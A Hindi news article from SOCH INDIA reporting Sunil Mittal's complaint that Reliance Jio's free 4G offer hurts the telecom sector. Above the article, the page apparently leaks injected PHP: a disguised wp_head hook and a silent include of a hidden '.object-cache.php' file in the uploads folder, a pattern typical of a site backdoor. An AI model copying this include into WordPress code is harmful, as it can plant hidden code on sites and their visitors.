add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); जियो की मुफ्त पेशकश से सेक्टर बुरी तरह प्रभावित – SOCH INDIA
Menu

व्यापार
जियो की मुफ्त पेशकश से सेक्टर बुरी तरह प्रभावित

nobanner

भारती एयरटेल के चेयरमैन सुनील मित्तल ने गुरुवार को कहा कि रिलायंस जियो की मुफ्त पेशकश से क्षेत्र बुरी तरह प्रभावित हुआ है और इसने बाजार में अनुचित प्रतिस्पर्धा की स्थिति पैदा कर दी है जिसे कंपनी ने अदालत में चुनौती दी है.

रिलायंस जियो की मुफ्त 4जी सेवा के भारती एयरटेल पर प्रभाव के बारे में पूछे जाने पर मित्तल ने कहा, ‘‘एक समस्या है. यदि कोई बड़ी चीज मुफ्त में दी जाती है, तो उससे प्रतिस्पर्धा करना काफी मुश्किल होता है. यह अनुचित प्रतिस्पर्धा है जिस पर मीडिया और अदालतों के जरिये चर्चा हो रही है.

वह यहां कोटक महिंद्रा बैंक के साथ भागीदारी में एयरटेल भुगतान बैंक के उद्घाटन के मौके पर संवाददाताओं से बात कर रहे थे. एयरटेल ने रिलायंस जियो की मुफ्त 4जी सेवा को दिसंबर से आगे बढ़ाने के खिलाफ याचिका दायर की है.